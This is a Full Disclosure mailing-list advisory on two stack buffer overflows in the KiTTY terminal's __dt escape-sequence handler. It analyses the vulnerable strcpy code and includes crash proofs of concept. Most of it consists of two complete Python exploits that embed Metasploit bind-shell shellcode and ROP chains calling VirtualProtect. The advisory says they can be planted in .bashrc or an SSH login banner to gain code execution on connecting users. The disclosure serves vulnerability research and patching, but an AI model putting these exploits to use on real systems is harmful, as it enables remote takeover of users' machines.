[<prev] [next>] [day] [month] [year] [list]
Message-ID: <IVwG-pJVHFkhgHlnwgPHtr06kaDb7sDmq5BUJ-ba5NjaZWgcAJvuqyBS8p6HobfUn6I-fpYCVv0FGI1UL21np5nHFK6qAaSEfh46MgqKH74=@defcesco.io>
Date: Wed, 07 Feb 2024 18:00:06 +0000
From: Austin DeFrancesco via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Buffer Overflow Vulnerabilities in KiTTY Start Duplicated
Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004)
Variables
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables
=================================================================================================================================
Contents:
---------
Summary
Analysis
Exploitation
Acknowledgments
Timeline
Additional Advisory
Summary:
--------
Austin A. DeFrancesco (DEFCESCO) discovered two stack-based buffer overflow vulnerabilities in KiTTY (https://github.com/cyd01/KiTTY/). These vulnerabilities:
- Are exploitable by any KiTTY user connecting to a host with the embedded exploit;
- The vulnerabilities were introduced in the original release in May 2021 (commit 4f79b1e) and affect all versions up to KiTTY ≤ 0.76.1.13 in their default configuration.
Austin developed an exploit for these vulnerabilities and obtained remote code execution in the context of the user running the application; by default, KiTTY can be operated in the user permission group of Standard Users. These exploits are stable and repeatable on all Microsoft Windows operating systems 11/10/8/7/XP.
Analysis:
---------
CVE-2024-25003 and CVE-2024-25004 buffer overflow vulnerabilities are in `kitty.c`. The vulnerable lines of code are on lines `2597-2602`; in the latest revision `75fa2abcd220c172` (https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2597-L2602).
If KiTTY encounters the ANSI escape sequence `\\033]0;__dt` in a stream, it interprets it as an instruction to create a duplicate terminal session:
- `\\033`: This is the escape character (octal representation of ASCII ESC), which signals the beginning of an escape sequence.
- `]0;`: This sequence part indicates a metacommand will be defined.
- `__dt`: This is the vulnerable KiTTY command to duplicate the terminal, which takes inputs of hostname and username.
- `\\077`: This is the terminator sequence to indicate the end of the escape sequence.
- KiTTY’s `kitty.c` `__dt` command checks if the first three characters of the string `cmd` are `d`, `t`, and `:`, respectively.
If the condition is true (at line 2596), an array `host` and `user` will be declared with a size of 1024 and 256 (at line 2597), respectively, and initialized with an empty string.
CVE-2024-25003, where the hostname is vulnerable to a stack-based buffer overflow, occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.
CVE-2024-25004, where the username is vulnerable to a stack-based buffer overflow, occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution.
Because `RemotePath` is created from a size calculated at runtime, `RemotePath` is not vulnerable to an overflow. It should be noted that `RemotePath` may be a `NULL` pointer if the allocation fails.
1. `strcpy(host, cmd + 3);` copies the substring of `cmd` starting from the 4th character (index 3) into the `host` array (at line 2601).
2. `i = poss(":", host);` assumes there’s a function `poss` that finds the position of the `:` character in the `host` string and assigns it to the variable `i` (at line 2601).
3. `strcpy(user, host + i);` copies the substring of `host` starting from the position after `:` into the `user` array (at line 2602).
2596 if( (cmd[0]=='d')&&(cmd[1]=='t')&&(cmd[2]==':') ) { // __dt: start a duplicated session in same directory, same host and same user : dt() { printf "\033]0;__dt:"$(hostname)":"${USER}":"`pwd`"\007" ; } 2597 char host[1024]="";char user[256]=""; 2598 int i; 2599 if( RemotePath!= NULL ) free( RemotePath ) ; 2600 RemotePath = (char*) malloc( strlen( cmd ) - 2 ) ; 2601 strcpy(host,cmd+3);i=poss(":",host); 2602 strcpy(user,host+i);
Exploitation:
-------------
### __dt Hostname & Username Buffer Overflows:
>From an attacker’s point of view, the exploits for CVE-2024-25003 and CVE-2024-25004 can be inserted into the `.bashrc` file for all users or in the SSH warning/message of the day (MOTD) banner. The exploit(s) will trigger once the user logs in or is presented with the SSH warning/MOTD banner.
HOSTNAME CRASH:
(47c.23ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=41414141 ecx=861615a9 edx=01130000 esi=41414141 edi=41414141
eip=41414141 esp=0084e790 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
41414141 ?? ???
USERNAME CRASH:
(af8.ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=41414141 ecx=02f92491 edx=01120000 esi=41414141 edi=41414141
eip=41414141 esp=0084e790 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
41414141 ?? ???
KiTTY’s `__dt` function crashed (at line 2601) because adjacent memory was overwritten.
To reproduce the vulnerability, follow these steps:
1. Start KiTTY and start an SSH session.
2. Save the proof of concept (PoC) on the connected SSH session.
3. Execute the PoC(s) using Python: `python3 developer_CVE-2024-25003.py` or `python3 developer_CVE-2024-25004`.
#!/usr/bin/python
#-------------------------------------------------------------------------------------#
# Crash: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start #
# Duplicated Session Hostname Variable (CVE-2024-25003) #
# OS: Microsoft Windows 11/10/8/7/XP #
# Author: DEFCESCO (Austin A. DeFrancesco) #
# Software: #
# <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
#-------------------------------------------------------------------------------------#
import sys
import os
sequence = b'A' * 1309
escape_sequence = b'\\033]0;__dt:' + sequence + b'\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
#!/usr/bin/python
#-------------------------------------------------------------------------------------#
# Crash: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start #
# Duplicated Session Username Variable (CVE-2024-25004) #
# OS: Microsoft Windows 11/10/8/7/XP #
# Author: DEFCESCO (Austin A. DeFrancesco) #
# Software: #
# <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
#-------------------------------------------------------------------------------------#
import sys
import os
sequence = b'A' * 1309
escape_sequence = b'\\033]0;__dt:localhost:' + sequence + b'\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
### Exploits:
To reproduce these exploits, follow these steps:
1. Start KiTTY and start an SSH session.
2. Save the proof of concept exploit(s) on the connected SSH session.
3. Update the payload handler and payload documented in the exploit’s comments.
4. Execute the exploit(s) using Python: `python3 CVE-2024-25003.py` or `python3 CVE-2024-25004.py`.
#!/usr/bin/python
#-------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start #
# Duplicated Session Hostname Variable (CVE-2024-25003) #
# OS: Microsoft Windows 11/10/8/7/XP #
# Author: DEFCESCO (Austin A. DeFrancesco) #
# Software: #
# <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
#-------------------------------------------------------------------------------------#
# More details can be found on my blog: <https://blog.DEFCESCO.io/Hell0+KiTTY> #
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(windows/shell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
import sys
import os
import struct
#---------------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x3A\\x40' -f py #
# windows/shell_bind_tcp - 375 bytes #
# <https://metasploit.com/> #
# Encoder: x86/xor_poly #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
# AutoVerifySession=true #
#---------------------------------------------------------------------------------------------#
buf = b""
buf += b"\\x51\\x53\\x56\\x57\\xdb\\xd9\\xd9\\x74\\x24\\xf4\\x5f\\x41"
buf += b"\\x49\\x31\\xc9\\x51\\x59\\x90\\x90\\x81\\xe9\\xae\\xff\\xff"
buf += b"\\xff\\xbe\\xd4\\xa1\\xc4\\xf4\\x31\\x77\\x2b\\x83\\xef\\xfc"
buf += b"\\x51\\x59\\x90\\xff\\xc9\\x75\\xf3\\x5f\\x5e\\x5b\\x59\\x28"
buf += b"\\x49\\x46\\xf4\\xd4\\xa1\\xa4\\x7d\\x31\\x90\\x04\\x90\\x5f"
buf += b"\\xf1\\xf4\\x7f\\x86\\xad\\x4f\\xa6\\xc0\\x2a\\xb6\\xdc\\xdb"
buf += b"\\x16\\x8e\\xd2\\xe5\\x5e\\x68\\xc8\\xb5\\xdd\\xc6\\xd8\\xf4"
buf += b"\\x60\\x0b\\xf9\\xd5\\x66\\x26\\x06\\x86\\xf6\\x4f\\xa6\\xc4"
buf += b"\\x2a\\x8e\\xc8\\x5f\\xed\\xd5\\x8c\\x37\\xe9\\xc5\\x25\\x85"
buf += b"\\x2a\\x9d\\xd4\\xd5\\x72\\x4f\\xbd\\xcc\\x42\\xfe\\xbd\\x5f"
buf += b"\\x95\\x4f\\xf5\\x02\\x90\\x3b\\x58\\x15\\x6e\\xc9\\xf5\\x13"
buf += b"\\x99\\x24\\x81\\x22\\xa2\\xb9\\x0c\\xef\\xdc\\xe0\\x81\\x30"
buf += b"\\xf9\\x4f\\xac\\xf0\\xa0\\x17\\x92\\x5f\\xad\\x8f\\x7f\\x8c"
buf += b"\\xbd\\xc5\\x27\\x5f\\xa5\\x4f\\xf5\\x04\\x28\\x80\\xd0\\xf0"
buf += b"\\xfa\\x9f\\x95\\x8d\\xfb\\x95\\x0b\\x34\\xfe\\x9b\\xae\\x5f"
buf += b"\\xb3\\x2f\\x79\\x89\\xc9\\xf7\\xc6\\xd4\\xa1\\xac\\x83\\xa7"
buf += b"\\x93\\x9b\\xa0\\xbc\\xed\\xb3\\xd2\\xd3\\x5e\\x11\\x4c\\x44"
buf += b"\\xa0\\xc4\\xf4\\xfd\\x65\\x90\\xa4\\xbc\\x88\\x44\\x9f\\xd4"
buf += b"\\x5e\\x11\\x9e\\xdc\\xf8\\x94\\x16\\x29\\xe1\\x94\\xb4\\x84"
buf += b"\\xc9\\x2e\\xfb\\x0b\\x41\\x3b\\x21\\x43\\xc9\\xc6\\xf4\\xc5"
buf += b"\\xfd\\x4d\\x12\\xbe\\xb1\\x92\\xa3\\xbc\\x63\\x1f\\xc3\\xb3"
buf += b"\\x5e\\x11\\xa3\\xbc\\x16\\x2d\\xcc\\x2b\\x5e\\x11\\xa3\\xbc"
buf += b"\\xd5\\x28\\xcf\\x35\\x5e\\x11\\xa3\\x43\\xc9\\xb1\\x9a\\x99"
buf += b"\\xc0\\x3b\\x21\\xbc\\xc2\\xa9\\x90\\xd4\\x28\\x27\\xa3\\x83"
buf += b"\\xf6\\xf5\\x02\\xbe\\xb3\\x9d\\xa2\\x36\\x5c\\xa2\\x33\\x90"
buf += b"\\x85\\xf8\\xf5\\xd5\\x2c\\x80\\xd0\\xc4\\x67\\xc4\\xb0\\x80"
buf += b"\\xf1\\x92\\xa2\\x82\\xe7\\x92\\xba\\x82\\xf7\\x97\\xa2\\xbc"
buf += b"\\xd8\\x08\\xcb\\x52\\x5e\\x11\\x7d\\x34\\xef\\x92\\xb2\\x2b"
buf += b"\\x91\\xac\\xfc\\x53\\xbc\\xa4\\x0b\\x01\\x1a\\x34\\x41\\x76"
buf += b"\\xf7\\xac\\x52\\x41\\x1c\\x59\\x0b\\x01\\x9d\\xc2\\x88\\xde"
buf += b"\\x21\\x3f\\x14\\xa1\\xa4\\x7f\\xb3\\xc7\\xd3\\xab\\x9e\\xd4"
buf += b"\\xf2\\x3b\\x21"
def shellcode():
sc = b''
sc += b'\\xBB\\x44\\x24\\x44\\x44' # mov ebx,0x44442444
sc += b'\\xB8\\x44\\x44\\x44\\x44' # mov eax,0x44444444
sc += b'\\x29\\xD8' # sub eax,ebx
sc += b'\\x29\\xC4' # sub esp,eax
sc += buf
sc += b'\\x90' * (1052-len(sc))
assert len(sc) == 1052
return sc
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953, # POP EBP # RETN [kitty.exe]
0x005405b0, # push esp; ret 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9, # POP EBX # RETN [kitty.exe]
0x00000201, # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce, # POP EDX # RETN [kitty.exe]
0x00000040, # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c, # POP ECX # RETN [kitty.exe]
0x004d81d9, # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404, # POP EDI # RETN [kitty.exe]
0x005a2001, # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090, # nop
0x41414141, # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac, # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#----------------------------------------------------------------------------------#
# Badchars: \\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x3A\\x40 #
# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : #
# ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
# ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} #
# Shellcode size at ESP: 1052 #
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'\\x90' * 35
nops = b'\\x90' * 88
escape_sequence = b'\\033]0;__dt:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\\x90'
escape_sequence += b"\\xE9\\x2A\\xFA\\xFF\\xFF" #jmp $eip-1490
escape_sequence += nops + b'\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
#!/usr/bin/python
#-------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Buffer Overflow Vulnerability in KiTTY Start #
# Duplicated Session Username Variable (CVE-2024-25004) #
# OS: Microsoft Windows 11/10/8/7/XP #
# Author: DEFCESCO (Austin A. DeFrancesco) #
# Software: #
# <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
#-------------------------------------------------------------------------------------#
# More details can be found on my blog: <https://blog.DEFCESCO.io/Hell0+KiTTY> #
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(windows/shell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
import sys
import os
import struct
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\\x00\\x07\\x0a\\x0d\\x1b\\x9c' -f py #
# windows/shell_bind_tcp - 355 bytes #
# <https://metasploit.com/> #
# Encoder: x86/shikata_ga_nai #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
# AutoVerifySession=true #
#-------------------------------------------------------------------------------------#
buf = b""
buf += b"\\xd9\\xe9\\xd9\\x74\\x24\\xf4\\xbd\\xfe\\xb7\\xa4\\x99\\x5e"
buf += b"\\x29\\xc9\\xb1\\x53\\x83\\xee\\xfc\\x31\\x6e\\x13\\x03\\x90"
buf += b"\\xa4\\x46\\x6c\\x90\\x23\\x04\\x8f\\x68\\xb4\\x69\\x19\\x8d"
buf += b"\\x85\\xa9\\x7d\\xc6\\xb6\\x19\\xf5\\x8a\\x3a\\xd1\\x5b\\x3e"
buf += b"\\xc8\\x97\\x73\\x31\\x79\\x1d\\xa2\\x7c\\x7a\\x0e\\x96\\x1f"
buf += b"\\xf8\\x4d\\xcb\\xff\\xc1\\x9d\\x1e\\xfe\\x06\\xc3\\xd3\\x52"
buf += b"\\xde\\x8f\\x46\\x42\\x6b\\xc5\\x5a\\xe9\\x27\\xcb\\xda\\x0e"
buf += b"\\xff\\xea\\xcb\\x81\\x8b\\xb4\\xcb\\x20\\x5f\\xcd\\x45\\x3a"
buf += b"\\xbc\\xe8\\x1c\\xb1\\x76\\x86\\x9e\\x13\\x47\\x67\\x0c\\x5a"
buf += b"\\x67\\x9a\\x4c\\x9b\\x40\\x45\\x3b\\xd5\\xb2\\xf8\\x3c\\x22"
buf += b"\\xc8\\x26\\xc8\\xb0\\x6a\\xac\\x6a\\x1c\\x8a\\x61\\xec\\xd7"
buf += b"\\x80\\xce\\x7a\\xbf\\x84\\xd1\\xaf\\xb4\\xb1\\x5a\\x4e\\x1a"
buf += b"\\x30\\x18\\x75\\xbe\\x18\\xfa\\x14\\xe7\\xc4\\xad\\x29\\xf7"
buf += b"\\xa6\\x12\\x8c\\x7c\\x4a\\x46\\xbd\\xdf\\x03\\xab\\x8c\\xdf"
buf += b"\\xd3\\xa3\\x87\\xac\\xe1\\x6c\\x3c\\x3a\\x4a\\xe4\\x9a\\xbd"
buf += b"\\xad\\xdf\\x5b\\x51\\x50\\xe0\\x9b\\x78\\x97\\xb4\\xcb\\x12"
buf += b"\\x3e\\xb5\\x87\\xe2\\xbf\\x60\\x3d\\xea\\x66\\xdb\\x20\\x17"
buf += b"\\xd8\\x8b\\xe4\\xb7\\xb1\\xc1\\xea\\xe8\\xa2\\xe9\\x20\\x81"
buf += b"\\x4b\\x14\\xcb\\xbc\\xd7\\x91\\x2d\\xd4\\xf7\\xf7\\xe6\\x40"
buf += b"\\x3a\\x2c\\x3f\\xf7\\x45\\x06\\x17\\x9f\\x0e\\x40\\xa0\\xa0"
buf += b"\\x8e\\x46\\x86\\x36\\x05\\x85\\x12\\x27\\x1a\\x80\\x32\\x30"
buf += b"\\x8d\\x5e\\xd3\\x73\\x2f\\x5e\\xfe\\xe3\\xcc\\xcd\\x65\\xf3"
buf += b"\\x9b\\xed\\x31\\xa4\\xcc\\xc0\\x4b\\x20\\xe1\\x7b\\xe2\\x56"
buf += b"\\xf8\\x1a\\xcd\\xd2\\x27\\xdf\\xd0\\xdb\\xaa\\x5b\\xf7\\xcb"
buf += b"\\x72\\x63\\xb3\\xbf\\x2a\\x32\\x6d\\x69\\x8d\\xec\\xdf\\xc3"
buf += b"\\x47\\x42\\xb6\\x83\\x1e\\xa8\\x09\\xd5\\x1e\\xe5\\xff\\x39"
buf += b"\\xae\\x50\\x46\\x46\\x1f\\x35\\x4e\\x3f\\x7d\\xa5\\xb1\\xea"
buf += b"\\xc5\\xd5\\xfb\\xb6\\x6c\\x7e\\xa2\\x23\\x2d\\xe3\\x55\\x9e"
buf += b"\\x72\\x1a\\xd6\\x2a\\x0b\\xd9\\xc6\\x5f\\x0e\\xa5\\x40\\x8c"
buf += b"\\x62\\xb6\\x24\\xb2\\xd1\\xb7\\x6c"
def shellcode():
sc = b''
sc += b'\\xBB\\x44\\x24\\x44\\x44' # mov ebx,0x44442444
sc += b'\\xB8\\x44\\x44\\x44\\x44' # mov eax,0x44444444
sc += b'\\x29\\xD8' # sub eax,ebx
sc += b'\\x29\\xC4' # sub esp,eax
sc += buf
sc += b'\\x90' * (1042-len(sc))
assert len(sc) == 1042
return sc
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953, # POP EBP # RETN [kitty.exe]
0x005405b0, # PUSH ESP; RETN 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9, # POP EBX # RETN [kitty.exe]
0x00000201, # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce, # POP EDX # RETN [kitty.exe]
0x00000040, # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c, # POP ECX # RETN [kitty.exe]
0x004d81d9, # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404, # POP EDI # RETN [kitty.exe]
0x005a2001, # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090, # nop
0x41414141, # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac, # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#----------------------------------------------------------------------------------#
# Badchars: \\x00\\x07\\x0a\\x0d\\x1b\\x9c\\x9d #
# Return Address Information: 0x00529720 : {pivot 324 / 0x144} : #
# ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
# ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} #
# Shellcode size at ESP: 1042 bytes #
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'\\x90' * 27
nops = b'\\x90' * 88
escape_sequence = b'\\033]0;__dt:localhost:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\\xE9\\x3D\\xFA\\xFF\\xFF' # jmp $eip-1471
escape_sequence += nops + b'\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
Acknowledgments:
----------------
Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE service requests.
Timeline:
---------
2024-01-08: This advisory contains one vulnerability and one additional advisory totaling three vulnerabilities sent to KiTTY maintainer Cyril Dupont; no reply from Cyril.
2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to Cyril Dupont; no reply.
2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).
Additional Advisory:
--------------------
CVE-2024-23749 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input: https://blog.defcesco.io/CVE-2024-23749
-----BEGIN PGP SIGNATURE-----
Version: ProtonMail
wnUEARYKACcFgmXDxSAJkLsLizjqexAlFiEETZ4dNJxyJAAtf1r5uwuLOOp7
ECUAACUTAP4oIK3jTlaYmcjg7f5yuEMXyOhRrs+SkR7PKd+eOeYlggEAmN3F
HN77fiaSDx9kM7Mqr+uS6M0crP1UO+ZbZGfTVQs=
=d91C
-----END PGP SIGNATURE-----
Download attachment "publickey - austin@...cesco.io - 0x4D9E1D34.asc" of type "application/pgp-keys" (584 bytes)
Download attachment "publickey - austin@...cesco.io - 0x4D9E1D34.asc.sig" of type "application/pgp-signature" (119 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists